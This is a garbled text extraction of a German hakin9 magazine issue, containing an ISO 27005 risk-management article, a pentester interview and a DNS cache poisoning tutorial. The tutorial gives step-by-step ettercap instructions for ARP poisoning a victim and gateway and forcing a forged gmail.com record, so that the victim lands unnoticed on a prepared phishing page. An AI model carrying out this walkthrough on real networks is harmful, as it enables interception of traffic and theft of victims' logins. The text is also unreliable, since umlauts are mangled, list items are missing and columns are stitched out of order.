wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
